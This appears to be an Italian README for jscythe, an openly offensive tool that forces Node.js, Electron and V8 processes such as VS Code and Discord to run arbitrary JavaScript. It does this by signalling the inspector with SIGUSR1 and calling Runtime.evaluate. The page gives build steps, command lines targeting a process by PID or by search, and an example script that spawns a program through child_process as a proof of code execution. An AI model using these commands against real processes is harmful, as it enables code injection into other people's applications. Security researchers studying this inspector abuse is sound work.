
Abusa del meccanismo inspector di node.js per forzare qualsiasi processo basato su node.js/electron/v8 ad eseguire codice JavaScript arbitrario.
jscythe abusa del meccanismo inspector di node.js per forzare qualsiasi processo basato su node.js/electron/v8 ad eseguire codice javascript arbitrario, anche se le loro capacità di debug sono disabilitate.

Testato e funzionante contro Visual Studio Code, Discord, qualsiasi applicazione Node.js e altro!
SIGUSR1 al processo: questo abiliterà il debugger su una porta (a seconda del software, a volte è casuale, a volte no).SIGUSR1.http://localhost:<port>/json.Runtime.evaluate con il codice fornito.cargo build --release
Targetta un processo specifico ed esegui un'espressione di base:
./target/release/jscythe --pid 666 --code "5 - 3 + 2"
Esegui codice da un file:
./target/release/jscythe --pid 666 --script example_script.js
Il file example_script.js può richiedere qualsiasi modulo node ed eseguire qualsiasi codice, come:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
Cerca un processo tramite espressione:
./target/release/jscythe --search extensionHost --script example_script.js
Esegui jscythe --help per l'elenco completo delle opzioni.
Questo progetto è realizzato con ♥ da @evilsocket ed è rilasciato sotto licenza GPL3.